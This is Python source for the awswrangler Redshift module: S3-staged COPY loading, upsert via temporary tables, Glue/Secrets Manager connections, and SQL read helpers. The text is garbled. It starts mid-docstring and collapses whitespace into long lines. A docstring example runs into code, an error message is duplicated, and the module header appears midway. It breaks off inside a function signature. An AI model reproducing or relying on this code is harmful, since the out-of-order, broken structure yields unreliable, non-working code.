        The session key for your AWS account. This is only needed when you are using temporary credentials.
    parquet_infer_sampling : float
        Random sample ratio of files that will have the metadata inspected.
        Must be `0.0 < sampling <= 1.0`.
        The higher, the more accurate.
        The lower, the faster.
    mode : str
        Append, overwrite or upsert.
    overwrite_method : str
        Drop, cascade, truncate, or delete. Only applicable in overwrite mode.

        "drop" - ``DROP ... RESTRICT`` - drops the table. Fails if there are any views that depend on it.
        "cascade" - ``DROP ... CASCADE`` - drops the table, and all views that depend on it.
"truncate" - ``TRUNCATE ...`` - truncates the table, but immediatly commits current transaction & starts a new one, hence the overwrite happens in two transactions and is not atomic. "delete" - ``DELETE FROM ...`` - deletes all rows from the table. Slow relative to the other methods. diststyle : str Redshift distribution styles. Must be in ["AUTO", "EVEN", "ALL", "KEY"]. https://docs.aws.amazon.com/redshift/latest/dg/t_Distributing_data.html distkey : str, optional Specifies a column name or positional number for the distribution key. sortstyle : str Sorting can be "COMPOUND" or "INTERLEAVED". https://docs.aws.amazon.com/redshift/latest/dg/t_Sorting_data.html sortkey : List[str], optional List of columns to be sorted. primary_keys : List[str], optional Primary keys. varchar_lengths_default : int The size that will be set for all VARCHAR columns not specified with varchar_lengths. varchar_lengths : Dict[str, int], optional Dict of VARCHAR length by columns. (e.g. {"col1": 10, "col5": 200}). serialize_to_json : bool Should Wrangler add SERIALIZETOJSON parameter into the COPY command? SERIALIZETOJSON is necessary to load nested data https://docs.aws.amazon.com/redshift/latest/dg/ingest-super.html#copy_json path_suffix: Union[str, List[str], None] Suffix or List of suffixes to be scanned on s3 for the schema extraction (e.g. [".gz.parquet", ".snappy.parquet"]). Only has effect during the table creation. If None, will try to read all files. (default) path_ignore_suffix: Union[str, List[str], None] Suffix or List of suffixes for S3 keys to be ignored during the schema extraction. (e.g. [".csv", "_SUCCESS"]). Only has effect during the table creation. If None, will try to read all files. (default) use_threads : bool, int True to enable concurrent requests, False to disable multiple threads. If enabled os.cpu_count() will be used as the max number of threads. If integer is provided, specified number is used. lock : bool True to execute LOCK command inside the transaction to force serializable isolation. commit_transaction: bool Whether to commit the transaction. True by default. boto3_session : boto3.Session(), optional Boto3 Session. The default boto3 session will be used if boto3_session receive None. s3_additional_kwargs: Forwarded to botocore requests. e.g. s3_additional_kwargs={'ServerSideEncryption': 'aws:kms', 'SSEKMSKeyId': 'YOUR_KMS_KEY_ARN'} Returns ------- None None. Examples -------- >>> import awswrangler as wr >>> con = wr.redshift.connect("MY_GLUE_CONNECTION") >>> wr.redshift.copy_from_files( ... path="s3://bucket/my_parquet_files/", ... con=con, ... table="my_table", ... schema="public" ... iam_role="arn:aws:iam::XXX:role/XXX" ... 
    autocommit_temp: bool = con.autocommit
    con.autocommit = False
    try:
        with con.cursor() as cursor:
            created_table, created_schema = _create_table(
                df=None,
                path=path,
                parquet_infer_sampling=parquet_infer_sampling,
                path_suffix=path_suffix,
                path_ignore_suffix=path_ignore_suffix,
                con=con,
                cursor=cursor,
                table=table,
                schema=schema,
                mode=mode,
                overwrite_method=overwrite_method,
                diststyle=diststyle,
                sortstyle=sortstyle,
                distkey=distkey,
                sortkey=sortkey,
                primary_keys=primary_keys,
                varchar_lengths_default=varchar_lengths_default,
                varchar_lengths=varchar_lengths,
                index=False,
                dtype=None,
                use_threads=use_threads,
                boto3_session=boto3_session,
                s3_additional_kwargs=s3_additional_kwargs,
            )
            if lock and table == created_table:
                # Lock before copy if copying into the target (not temp) table
                _lock(cursor, [table], schema=schema)
            _copy(
                cursor=cursor,
                path=path,
                table=created_table,
                schema=created_schema,
                iam_role=iam_role,
                aws_access_key_id=aws_access_key_id,
                aws_secret_access_key=aws_secret_access_key,
                aws_session_token=aws_session_token,
                boto3_session=boto3_session,
                serialize_to_json=serialize_to_json,
            )
            if table != created_table:  # upsert
                if lock:
                    _lock(cursor, [table], schema=schema)
                _upsert(cursor=cursor, schema=schema, table=table, temp_table=created_table, primary_keys=primary_keys)
            if commit_transaction:
                con.commit()
    except Exception as ex:
        con.rollback()
        _logger.error(ex)
        raise
    finally:
        con.autocommit = autocommit_temp


def copy(  # pylint: disable=too-many-arguments
    df: pd.DataFrame,
    path: str,
    con: redshift_connector.Connection,
    table: str,
    schema: str,
    iam_role: Optional[str] = None,
    aws_access_key_id: Optional[str] = None,
    aws_secret_access_key: Optional[str] = None,
    aws_session_token: Optional[str] = None,
    index: bool = False,
    dtype: Optional[Dict[str, str]] = None,
    mode: str = "append",
    overwrite_method: str = "drop",
    diststyle: str = "AUTO",
    distkey: Optional[str] = None,
    sortstyle: str = "COMPOUND",
    sortkey: Optional[List[str]] = None,
    primary_keys: Optional[List[str]] = None,
    varchar_lengths_default: int = 256,
    varchar_lengths: Optional[Dict[str, int]] = None,
    serialize_to_json: bool = False,
    keep_files: bool = False,
    use_threads: Union[bool, int] = True,
    lock: bool = False,
    boto3_session: Optional[boto3.Session] = None,
    s3_additional_kwargs: Optional[Dict[str, str]] = None,
    max_rows_by_file: Optional[int] = 10_000_000,
) -> None:
    """Load Pandas DataFrame as a Table on Amazon Redshift using parquet files on S3 as stage.

    This is a **HIGH** latency and **HIGH** throughput alternative to `wr.redshift.to_sql()` to load large
    DataFrames into Amazon Redshift through the **SQL COPY command**.

    This strategy has more overhead and requires more IAM privileges
    than the regular `wr.redshift.to_sql()` function, so it is only recommended
    for inserting 1K+ rows at once.

    https://docs.aws.amazon.com/redshift/latest/dg/r_COPY.html

    Note
    ----
    If the table does not exist yet, it will be automatically created for you
    using the Parquet metadata to infer the columns data types.

    Note
    ----
    If `use_threads=True`, the number of threads that will be spawned is obtained from os.cpu_count().

    Parameters
    ----------
    df : pandas.DataFrame
        Pandas DataFrame.
    path : str
        S3 path to write stage files (e.g. s3://bucket_name/any_name/).
        Note: This path must be empty.
    con : redshift_connector.Connection
        Use redshift_connector.connect() to use credentials directly or
        wr.redshift.connect() to fetch it from the Glue Catalog.
    table : str
        Table name
    schema : str
        Schema name
    iam_role : str, optional
        AWS IAM role with the related permissions.
    aws_access_key_id : str, optional
        The access key for your AWS account.
    aws_secret_access_key : str, optional
        The secret key for your AWS account.
    aws_session_token : str, optional
        The session key for your AWS account. This is only needed when you are using temporary credentials.
    index : bool
        True to store the DataFrame index in file, otherwise False to ignore it.
    dtype : Dict[str, str], optional
        Dictionary of column names and Athena/Glue types to be cast.
        Useful when you have columns with undetermined or mixed data types.
        Only takes effect if dataset=True.
        (e.g. {'col name': 'bigint', 'col2 name': 'int'})
    mode : str
        Append, overwrite or upsert.
    overwrite_method : str
        Drop, cascade, truncate, or delete. Only applicable in overwrite mode.

        "drop" - ``DROP ... RESTRICT`` - drops the table. Fails if there are any views that depend on it.
        "cascade" - ``DROP ... CASCADE`` - drops the table, and all views that depend on it.
        "truncate" - ``TRUNCATE ...`` - truncates the table, but immediately commits the current
        transaction & starts a new one, hence the overwrite happens in two transactions and is not atomic.
        "delete" - ``DELETE FROM ...`` - deletes all rows from the table. Slow relative to the other methods.
    diststyle : str
        Redshift distribution styles. Must be in ["AUTO", "EVEN", "ALL", "KEY"].
        https://docs.aws.amazon.com/redshift/latest/dg/t_Distributing_data.html
    distkey : str, optional
        Specifies a column name or positional number for the distribution key.
    sortstyle : str
        Sorting can be "COMPOUND" or "INTERLEAVED".
        https://docs.aws.amazon.com/redshift/latest/dg/t_Sorting_data.html
    sortkey : List[str], optional
        List of columns to be sorted.
    primary_keys : List[str], optional
        Primary keys.
    varchar_lengths_default : int
        The size that will be set for all VARCHAR columns not specified with varchar_lengths.
    varchar_lengths : Dict[str, int], optional
        Dict of VARCHAR length by columns. (e.g. {"col1": 10, "col5": 200}).
    keep_files : bool
        Whether to keep stage files.
    use_threads : bool, int
        True to enable concurrent requests, False to disable multiple threads.
        If enabled os.cpu_count() will be used as the max number of threads.
        If integer is provided, specified number is used.
    lock : bool
        True to execute LOCK command inside the transaction to force serializable isolation.
    boto3_session : boto3.Session(), optional
        Boto3 Session. The default boto3 session will be used if boto3_session receives None.
    s3_additional_kwargs : Dict[str, str], optional
        Forwarded to botocore requests.
        e.g. s3_additional_kwargs={'ServerSideEncryption': 'aws:kms', 'SSEKMSKeyId': 'YOUR_KMS_KEY_ARN'}
    max_rows_by_file : int, optional
        Max number of rows in each file. (e.g. 33554432, 268435456)
        Defaults to 10,000,000. If None, the files are not split.

    Returns
    -------
    None
        None.

    Examples
    --------
    >>> import awswrangler as wr
    >>> import pandas as pd
    >>> con = wr.redshift.connect("MY_GLUE_CONNECTION")
    >>> wr.redshift.copy(
    ...     df=pd.DataFrame({'col': [1, 2, 3]}),
    ...     path="s3://bucket/my_parquet_files/",
    ...     con=con,
    ...     table="my_table",
    ...     schema="public",
    ...     iam_role="arn:aws:iam::XXX:role/XXX"
    ... )
    >>> con.close()

    """
    path = path[:-1] if path.endswith("*") else path
    path = path if path.endswith("/") else f"{path}/"
    session: boto3.Session = _utils.ensure_session(session=boto3_session)
    if s3.list_objects(path=path, boto3_session=session, s3_additional_kwargs=s3_additional_kwargs):
        raise exceptions.InvalidArgument(
            f"The received S3 path ({path}) is not empty. "
            "Please provide a different path or use wr.s3.delete_objects() to clean up the current one."
        )
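    # Stage the DataFrame as Parquet under the (empty) S3 path, COPY it into
    # Redshift, and always clean up the stage files afterwards unless keep_files=True.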
" "Please, provide a different path or use wr.s3.delete_objects() to clean up the current one." ) try: s3.to_parquet( df=df, path=path, index=index, dataset=True, mode="append", dtype=dtype, use_threads=use_threads, boto3_session=session, s3_additional_kwargs=s3_additional_kwargs, max_rows_by_file=max_rows_by_file, ) copy_from_files( path=path, con=con, table=table, schema=schema, iam_role=iam_role, aws_access_key_id=aws_access_key_id, aws_secret_access_key=aws_secret_access_key, aws_session_token=aws_session_token, mode=mode, overwrite_method=overwrite_method, diststyle=diststyle, distkey=distkey, sortstyle=sortstyle, sortkey=sortkey, primary_keys=primary_keys, varchar_lengths_default=varchar_lengths_default, varchar_lengths=varchar_lengths, serialize_to_json=serialize_to_json, use_threads=use_threads, lock=lock, boto3_session=session, s3_additional_kwargs=s3_additional_kwargs, ) finally: if keep_files is False: s3.delete_objects( path=path, use_threads=use_threads, boto3_session=session, s3_additional_kwargs=s3_additional_kwargs )
"""Amazon Redshift Module.""" # pylint: disable=too-many-lines import logging import uuid from typing import Any, Dict, Iterator, List, Optional, Tuple, Union import boto3 import botocore import pandas as pd import pyarrow as pa import redshift_connector from awswrangler import _data_types from awswrangler import _databases as _db_utils from awswrangler import _utils, exceptions, s3 from awswrangler._config import apply_configs _logger: logging.Logger = logging.getLogger(__name__) _RS_DISTSTYLES: List[str] = ["AUTO", "EVEN", "ALL", "KEY"] _RS_SORTSTYLES: List[str] = ["COMPOUND", "INTERLEAVED"] def _validate_connection(con: redshift_connector.Connection) -> None: if not isinstance(con, redshift_connector.Connection): raise exceptions.InvalidConnection( "Invalid 'conn' argument, please pass a " "redshift_connector.Connection object. Use redshift_connector.connect() to use " "credentials directly or wr.redshift.connect() to fetch it from the Glue Catalog." ) def _begin_transaction(cursor: redshift_connector.Cursor) -> None: sql = "BEGIN TRANSACTION" _logger.debug("Begin transaction query:\n%s", sql) cursor.execute(sql) def _drop_table(cursor: redshift_connector.Cursor, schema: Optional[str], table: str, cascade: bool = False) -> None: schema_str = f'"{schema}".' if schema else "" cascade_str = " CASCADE" if cascade else "" sql = f'DROP TABLE IF EXISTS {schema_str}"{table}"' f"{cascade_str}" _logger.debug("Drop table query:\n%s", sql) cursor.execute(sql) def _truncate_table(cursor: redshift_connector.Cursor, schema: Optional[str], table: str) -> None: schema_str = f'"{schema}".' if schema else "" sql = f'TRUNCATE TABLE {schema_str}"{table}"' _logger.debug("Truncate table query:\n%s", sql) cursor.execute(sql) def _delete_all(cursor: redshift_connector.Cursor, schema: Optional[str], table: str) -> None: schema_str = f'"{schema}".' 
if schema else "" sql = f'DELETE FROM {schema_str}"{table}"' _logger.debug("Delete query:\n%s", sql) cursor.execute(sql) def _get_primary_keys(cursor: redshift_connector.Cursor, schema: str, table: str) -> List[str]: cursor.execute(f"SELECT indexdef FROM pg_indexes WHERE schemaname = '{schema}' AND tablename = '{table}'") result: str = cursor.fetchall()[0][0] rfields: List[str] = result.split("(")[1].strip(")").split(",") fields: List[str] = [field.strip().strip('"') for field in rfields] return fields def _does_table_exist(cursor: redshift_connector.Cursor, schema: Optional[str], table: str) -> bool: schema_str = f"TABLE_SCHEMA = '{schema}' AND" if schema else "" cursor.execute( f"SELECT true WHERE EXISTS (" f"SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE " f"{schema_str} TABLE_NAME = '{table}'" f");" ) return len(cursor.fetchall()) > 0 def _make_s3_auth_string( aws_access_key_id: Optional[str] = None, aws_secret_access_key: Optional[str] = None, aws_session_token: Optional[str] = None, iam_role: Optional[str] = None, boto3_session: Optional[boto3.Session] = None, ) -> str: if aws_access_key_id is not None and aws_secret_access_key is not None: auth_str: str = f"ACCESS_KEY_ID '{aws_access_key_id}'\nSECRET_ACCESS_KEY '{aws_secret_access_key}'\n" if aws_session_token is not None: auth_str += f"SESSION_TOKEN '{aws_session_token}'\n" elif iam_role is not None: auth_str = f"IAM_ROLE '{iam_role}'\n" else: _logger.debug("Attempting to get S3 authorization credentials from boto3 session.") credentials: botocore.credentials.ReadOnlyCredentials credentials = _utils.get_credentials_from_session(boto3_session=boto3_session) if credentials.access_key is None or credentials.secret_key is None: raise exceptions.InvalidArgument( "One of IAM Role or AWS ACCESS_KEY_ID and SECRET_ACCESS_KEY must be " "given. Unable to find ACCESS_KEY_ID and SECRET_ACCESS_KEY in boto3 " "session." 
) auth_str = f"ACCESS_KEY_ID '{credentials.access_key}'\nSECRET_ACCESS_KEY '{credentials.secret_key}'\n" if credentials.token is not None: auth_str += f"SESSION_TOKEN '{credentials.token}'\n" return auth_str def _copy( cursor: redshift_connector.Cursor, path: str, table: str, serialize_to_json: bool, iam_role: Optional[str] = None, aws_access_key_id: Optional[str] = None, aws_secret_access_key: Optional[str] = None, aws_session_token: Optional[str] = None, boto3_session: Optional[str] = None, schema: Optional[str] = None, ) -> None: if schema is None: table_name: str = f'"{table}"' else: table_name = f'"{schema}"."{table}"' auth_str: str = _make_s3_auth_string( iam_role=iam_role, aws_access_key_id=aws_access_key_id, aws_secret_access_key=aws_secret_access_key, aws_session_token=aws_session_token, boto3_session=boto3_session, ) ser_json_str: str = " SERIALIZETOJSON" if serialize_to_json else "" sql: str = f"COPY {table_name}\nFROM '{path}' {auth_str}\nFORMAT AS PARQUET{ser_json_str}" _logger.debug("copy query:\n%s", sql) cursor.execute(sql) def _lock( cursor: redshift_connector.Cursor, table_names: List[str], schema: Optional[str] = None, ) -> None: fmt = '"{schema}"."{table}"' if schema else '"{table}"' tables = ", ".join([fmt.format(schema=schema, table=table) for table in table_names]) sql: str = f"LOCK {tables};\n" _logger.debug("lock query:\n%s", sql) cursor.execute(sql) def _upsert( cursor: redshift_connector.Cursor, table: str, temp_table: str, schema: str, primary_keys: Optional[List[str]] = None, ) -> None: if not primary_keys: primary_keys = _get_primary_keys(cursor=cursor, schema=schema, table=table) _logger.debug("primary_keys: %s", primary_keys) if not primary_keys: raise exceptions.InvalidRedshiftPrimaryKeys() equals_clause: str = f"{table}.%s = {temp_table}.%s" join_clause: str = " AND ".join([equals_clause % (pk, pk) for pk in primary_keys]) sql: str = f'DELETE FROM "{schema}"."{table}" USING {temp_table} WHERE {join_clause}' _logger.debug(sql) cursor.execute(sql) sql = f"INSERT INTO {schema}.{table} SELECT * FROM {temp_table}" _logger.debug(sql) cursor.execute(sql) _drop_table(cursor=cursor, schema=schema, table=temp_table) def _validate_parameters( redshift_types: Dict[str, str], diststyle: str, distkey: Optional[str], sortstyle: str, sortkey: Optional[List[str]], ) -> None: if diststyle not in _RS_DISTSTYLES: raise exceptions.InvalidRedshiftDiststyle(f"diststyle must be in {_RS_DISTSTYLES}") cols = list(redshift_types.keys()) _logger.debug("Redshift columns: %s", cols) if (diststyle == "KEY") and (not distkey): raise exceptions.InvalidRedshiftDistkey("You must pass a distkey if you intend to use KEY diststyle") if distkey and distkey not in cols: raise exceptions.InvalidRedshiftDistkey(f"distkey ({distkey}) must be in the columns list: {cols})") if sortstyle and sortstyle not in _RS_SORTSTYLES: raise exceptions.InvalidRedshiftSortstyle(f"sortstyle must be in {_RS_SORTSTYLES}") if sortkey: if not isinstance(sortkey, list): raise exceptions.InvalidRedshiftSortkey( f"sortkey must be a List of items in the columns list: {cols}. " f"Currently value: {sortkey}" ) for key in sortkey: if key not in cols: raise exceptions.InvalidRedshiftSortkey( f"sortkey must be a List of items in the columns list: {cols}. 
" f"Currently value: {key}" ) def _redshift_types_from_path( path: Optional[Union[str, List[str]]], varchar_lengths_default: int, varchar_lengths: Optional[Dict[str, int]], parquet_infer_sampling: float, path_suffix: Optional[str], path_ignore_suffix: Optional[str], use_threads: Union[bool, int], boto3_session: Optional[boto3.Session], s3_additional_kwargs: Optional[Dict[str, str]], ) -> Dict[str, str]: """Extract Redshift data types from a Pandas DataFrame.""" _varchar_lengths: Dict[str, int] = {} if varchar_lengths is None else varchar_lengths session: boto3.Session = _utils.ensure_session(session=boto3_session) _logger.debug("Scanning parquet schemas on s3...") athena_types, _ = s3.read_parquet_metadata( path=path, sampling=parquet_infer_sampling, path_suffix=path_suffix, path_ignore_suffix=path_ignore_suffix, dataset=False, use_threads=use_threads, boto3_session=session, s3_additional_kwargs=s3_additional_kwargs, ) _logger.debug("athena_types: %s", athena_types) redshift_types: Dict[str, str] = {} for col_name, col_type in athena_types.items(): length: int = _varchar_lengths[col_name] if col_name in _varchar_lengths else varchar_lengths_default redshift_types[col_name] = _data_types.athena2redshift(dtype=col_type, varchar_length=length) return redshift_types def _create_table( # pylint: disable=too-many-locals,too-many-arguments df: Optional[pd.DataFrame], path: Optional[Union[str, List[str]]], con: redshift_connector.Connection, cursor: redshift_connector.Cursor, table: str, schema: str, mode: str, overwrite_method: str, index: bool, dtype: Optional[Dict[str, str]], diststyle: str, sortstyle: str, distkey: Optional[str], sortkey: Optional[List[str]], primary_keys: Optional[List[str]], varchar_lengths_default: int, varchar_lengths: Optional[Dict[str, int]], parquet_infer_sampling: float = 1.0, path_suffix: Optional[str] = None, path_ignore_suffix: Optional[str] = None, use_threads: Union[bool, int] = True, boto3_session: Optional[boto3.Session] = None, s3_additional_kwargs: Optional[Dict[str, str]] = None, ) -> Tuple[str, Optional[str]]: if mode == "overwrite": if overwrite_method == "truncate": try: # Truncate commits current transaction, if successful. # Fast, but not atomic. _truncate_table(cursor=cursor, schema=schema, table=table) except redshift_connector.error.ProgrammingError as e: # Caught "relation does not exist". if e.args[0]["C"] != "42P01": # pylint: disable=invalid-sequence-index raise e _logger.debug(str(e)) con.rollback() _begin_transaction(cursor=cursor) elif overwrite_method == "delete": if _does_table_exist(cursor=cursor, schema=schema, table=table): # Atomic, but slow. _delete_all(cursor=cursor, schema=schema, table=table) else: # Fast, atomic, but either fails if there are any dependent views or, in cascade mode, deletes them. 
_drop_table(cursor=cursor, schema=schema, table=table, cascade=bool(overwrite_method == "cascade")) elif _does_table_exist(cursor=cursor, schema=schema, table=table) is True: if mode == "upsert": guid: str = uuid.uuid4().hex temp_table: str = f"temp_redshift_{guid}" sql: str = f'CREATE TEMPORARY TABLE {temp_table} (LIKE "{schema}"."{table}")' _logger.debug(sql) cursor.execute(sql) return temp_table, None return table, schema diststyle = diststyle.upper() if diststyle else "AUTO" sortstyle = sortstyle.upper() if sortstyle else "COMPOUND" if df is not None: redshift_types: Dict[str, str] = _data_types.database_types_from_pandas( df=df, index=index, dtype=dtype, varchar_lengths_default=varchar_lengths_default, varchar_lengths=varchar_lengths, converter_func=_data_types.pyarrow2redshift, ) elif path is not None: redshift_types = _redshift_types_from_path( path=path, varchar_lengths_default=varchar_lengths_default, varchar_lengths=varchar_lengths, parquet_infer_sampling=parquet_infer_sampling, path_suffix=path_suffix, path_ignore_suffix=path_ignore_suffix, use_threads=use_threads, boto3_session=boto3_session, s3_additional_kwargs=s3_additional_kwargs, ) else: raise ValueError("df and path are None.You MUST pass at least one.") _validate_parameters( redshift_types=redshift_types, diststyle=diststyle, distkey=distkey, sortstyle=sortstyle, sortkey=sortkey, ) cols_str: str = "".join([f"{k} {v},\n" for k, v in redshift_types.items()])[:-2] primary_keys_str: str = f",\nPRIMARY KEY ({', '.join(primary_keys)})" if primary_keys else "" distkey_str: str = f"\nDISTKEY({distkey})" if distkey and diststyle == "KEY" else "" sortkey_str: str = f"\n{sortstyle} SORTKEY({','.join(sortkey)})" if sortkey else "" sql = ( f'CREATE TABLE IF NOT EXISTS "{schema}"."{table}" (\n' f"{cols_str}" f"{primary_keys_str}" f")\nDISTSTYLE {diststyle}" f"{distkey_str}" f"{sortkey_str}" ) _logger.debug("Create table query:\n%s", sql) cursor.execute(sql) return table, schema def _read_parquet_iterator( path: str, keep_files: bool, use_threads: Union[bool, int], categories: Optional[List[str]], chunked: Union[bool, int], boto3_session: Optional[boto3.Session], s3_additional_kwargs: Optional[Dict[str, str]], ) -> Iterator[pd.DataFrame]: dfs: Iterator[pd.DataFrame] = s3.read_parquet( path=path, categories=categories, chunked=chunked, dataset=False, use_threads=use_threads, boto3_session=boto3_session, s3_additional_kwargs=s3_additional_kwargs, ) yield from dfs if keep_files is False: s3.delete_objects( path=path, use_threads=use_threads, boto3_session=boto3_session, s3_additional_kwargs=s3_additional_kwargs ) def connect( connection: Optional[str] = None, secret_id: Optional[str] = None, catalog_id: Optional[str] = None, dbname: Optional[str] = None, boto3_session: Optional[boto3.Session] = None, ssl: bool = True, timeout: Optional[int] = None, max_prepared_statements: int = 1000, tcp_keepalive: bool = True, ) -> redshift_connector.Connection: """Return a redshift_connector connection from a Glue Catalog or Secret Manager. Note ---- You MUST pass a `connection` OR `secret_id`. Here is an example of the secret structure in Secrets Manager: { "host":"my-host.us-east-1.redshift.amazonaws.com", "username":"test", "password":"test", "engine":"redshift", "port":"5439", "dbname": "mydb" } https://github.com/aws/amazon-redshift-python-driver Parameters ---------- connection : Optional[str] Glue Catalog Connection name. secret_id: Optional[str]: Specifies the secret containing the connection details that you want to retrieve. 
You can specify either the Amazon Resource Name (ARN) or the friendly name of the secret. catalog_id : str, optional The ID of the Data Catalog. If none is provided, the AWS account ID is used by default. dbname: Optional[str] Optional database name to overwrite the stored one. boto3_session : boto3.Session(), optional Boto3 Session. The default boto3 session will be used if boto3_session receive None. ssl: bool This governs SSL encryption for TCP/IP sockets. This parameter is forward to redshift_connector. https://github.com/aws/amazon-redshift-python-driver timeout: Optional[int] This is the time in seconds before the connection to the server will time out. The default is None which means no timeout. This parameter is forward to redshift_connector. https://github.com/aws/amazon-redshift-python-driver max_prepared_statements: int This parameter is forward to redshift_connector. https://github.com/aws/amazon-redshift-python-driver tcp_keepalive: bool If True then use TCP keepalive. The default is True. This parameter is forward to redshift_connector. https://github.com/aws/amazon-redshift-python-driver Returns ------- redshift_connector.Connection redshift_connector connection. Examples -------- Fetching Redshift connection from Glue Catalog >>> import awswrangler as wr >>> con = wr.redshift.connect("MY_GLUE_CONNECTION") >>> with con.cursor() as cursor: >>> cursor.execute("SELECT 1") >>> print(cursor.fetchall()) >>> con.close() Fetching Redshift connection from Secrets Manager >>> import awswrangler as wr >>> con = wr.redshift.connect(secret_id="MY_SECRET") >>> with con.cursor() as cursor: >>> cursor.execute("SELECT 1") >>> print(cursor.fetchall()) >>> con.close() """ attrs: _db_utils.ConnectionAttributes = _db_utils.get_connection_attributes( connection=connection, secret_id=secret_id, catalog_id=catalog_id, dbname=dbname, boto3_session=boto3_session ) if attrs.kind != "redshift": raise exceptions.InvalidDatabaseType( f"Invalid connection type ({attrs.kind}. It must be a redshift connection.)" ) return redshift_connector.connect( user=attrs.user, database=attrs.database, password=attrs.password, port=int(attrs.port), host=attrs.host, ssl=ssl, timeout=timeout, max_prepared_statements=max_prepared_statements, tcp_keepalive=tcp_keepalive, ) def connect_temp( cluster_identifier: str, user: str, database: Optional[str] = None, duration: int = 900, auto_create: bool = True, db_groups: Optional[List[str]] = None, boto3_session: Optional[boto3.Session] = None, ssl: bool = True, timeout: Optional[int] = None, max_prepared_statements: int = 1000, tcp_keepalive: bool = True, ) -> redshift_connector.Connection: """Return a redshift_connector temporary connection (No password required). https://github.com/aws/amazon-redshift-python-driver Parameters ---------- cluster_identifier : str The unique identifier of a cluster. This parameter is case sensitive. user : str, optional The name of a database user. database : str, optional Database name. If None, the default Database is used. duration : int, optional The number of seconds until the returned temporary password expires. Constraint: minimum 900, maximum 3600. Default: 900 auto_create : bool Create a database user with the name specified for the user named in user if one does not exist. db_groups : List[str], optional A list of the names of existing database groups that the user named in user will join for the current session, in addition to any group memberships for an existing user. If not specified, a new user is added only to PUBLIC. 
boto3_session : boto3.Session(), optional Boto3 Session. The default boto3 session will be used if boto3_session receive None. ssl: bool This governs SSL encryption for TCP/IP sockets. This parameter is forward to redshift_connector. https://github.com/aws/amazon-redshift-python-driver timeout: Optional[int] This is the time in seconds before the connection to the server will time out. The default is None which means no timeout. This parameter is forward to redshift_connector. https://github.com/aws/amazon-redshift-python-driver max_prepared_statements: int This parameter is forward to redshift_connector. https://github.com/aws/amazon-redshift-python-driver tcp_keepalive: bool If True then use TCP keepalive. The default is True. This parameter is forward to redshift_connector. https://github.com/aws/amazon-redshift-python-driver Returns ------- redshift_connector.Connection redshift_connector connection. Examples -------- >>> import awswrangler as wr >>> con = wr.redshift.connect_temp(cluster_identifier="my-cluster", user="test") >>> with con.cursor() as cursor: >>> cursor.execute("SELECT 1") >>> print(cursor.fetchall()) >>> con.close() """ client_redshift: boto3.client = _utils.client(service_name="redshift", session=boto3_session) args: Dict[str, Any] = { "DbUser": user, "ClusterIdentifier": cluster_identifier, "DurationSeconds": duration, "AutoCreate": auto_create, } if db_groups is not None: args["DbGroups"] = db_groups else: db_groups = [] res: Dict[str, Any] = client_redshift.get_cluster_credentials(**args) cluster: Dict[str, Any] = client_redshift.describe_clusters(ClusterIdentifier=cluster_identifier)["Clusters"][0] return redshift_connector.connect( user=res["DbUser"], database=database if database else cluster["DBName"], password=res["DbPassword"], port=cluster["Endpoint"]["Port"], host=cluster["Endpoint"]["Address"], ssl=ssl, timeout=timeout, max_prepared_statements=max_prepared_statements, tcp_keepalive=tcp_keepalive, db_groups=db_groups, ) def read_sql_query( sql: str, con: redshift_connector.Connection, index_col: Optional[Union[str, List[str]]] = None, params: Optional[Union[List[Any], Tuple[Any, ...], Dict[Any, Any]]] = None, chunksize: Optional[int] = None, dtype: Optional[Dict[str, pa.DataType]] = None, safe: bool = True, ) -> Union[pd.DataFrame, Iterator[pd.DataFrame]]: """Return a DataFrame corresponding to the result set of the query string. Note ---- For large extractions (1K+ rows) consider the function **wr.redshift.unload()**. Parameters ---------- sql : str SQL query. con : redshift_connector.Connection Use redshift_connector.connect() to use " "credentials directly or wr.redshift.connect() to fetch it from the Glue Catalog. index_col : Union[str, List[str]], optional Column(s) to set as index(MultiIndex). params : Union[List, Tuple, Dict], optional List of parameters to pass to execute method. The syntax used to pass parameters is database driver dependent. Check your database driver documentation for which of the five syntax styles, described in PEP 249’s paramstyle, is supported. chunksize : int, optional If specified, return an iterator where chunksize is the number of rows to include in each chunk. dtype : Dict[str, pyarrow.DataType], optional Specifying the datatype for columns. The keys should be the column names and the values should be the PyArrow types. safe : bool Check for overflows or other unsafe data type conversions. Returns ------- Union[pandas.DataFrame, Iterator[pandas.DataFrame]] Result as Pandas DataFrame(s). 
Examples -------- Reading from Redshift using a Glue Catalog Connection >>> import awswrangler as wr >>> con = wr.redshift.connect("MY_GLUE_CONNECTION") >>> df = wr.redshift.read_sql_query( ... sql="SELECT * FROM public.my_table", ... con=con ... ) >>> con.close() """ _validate_connection(con=con) return _db_utils.read_sql_query( sql=sql, con=con, index_col=index_col, params=params, chunksize=chunksize, dtype=dtype, safe=safe ) def read_sql_table( table: str, con: redshift_connector.Connection, schema: Optional[str] = None, index_col: Optional[Union[str, List[str]]] = None, params: Optional[Union[List[Any], Tuple[Any, ...], Dict[Any, Any]]] = None, chunksize: Optional[int] = None, dtype: Optional[Dict[str, pa.DataType]] = None, safe: bool = True, ) -> Union[pd.DataFrame, Iterator[pd.DataFrame]]: """Return a DataFrame corresponding to the table. Note ---- For large extractions (1K+ rows) consider the function **wr.redshift.unload()**. Parameters ---------- table : str Table name. con : redshift_connector.Connection Use redshift_connector.connect() to use credentials directly or wr.redshift.connect() to fetch it from the Glue Catalog. schema : str, optional Name of SQL schema in database to query (if database flavor supports this). Uses default schema if None (default). index_col : Union[str, List[str]], optional Column(s) to set as index (MultiIndex). params : Union[List, Tuple, Dict], optional List of parameters to pass to execute method. The syntax used to pass parameters is database driver dependent. Check your database driver documentation for which of the five syntax styles, described in PEP 249's paramstyle, is supported. chunksize : int, optional If specified, return an iterator where chunksize is the number of rows to include in each chunk. dtype : Dict[str, pyarrow.DataType], optional Specifying the datatype for columns. The keys should be the column names and the values should be the PyArrow types. safe : bool Check for overflows or other unsafe data type conversions. Returns ------- Union[pandas.DataFrame, Iterator[pandas.DataFrame]] Result as Pandas DataFrame(s). Examples -------- Reading from Redshift using a Glue Catalog Connection >>> import awswrangler as wr >>> con = wr.redshift.connect("MY_GLUE_CONNECTION") >>> df = wr.redshift.read_sql_table( ... table="my_table", ... schema="public", ... con=con ... ) >>> con.close() """ sql: str = f'SELECT * FROM "{table}"' if schema is None else f'SELECT * FROM "{schema}"."{table}"' return read_sql_query( sql=sql, con=con, index_col=index_col, params=params, chunksize=chunksize, dtype=dtype, safe=safe ) @apply_configs def to_sql( # pylint: disable=too-many-locals df: pd.DataFrame, con: redshift_connector.Connection, table: str, schema: str, mode: str = "append", overwrite_method: str = "drop", index: bool = False, dtype: Optional[Dict[str, 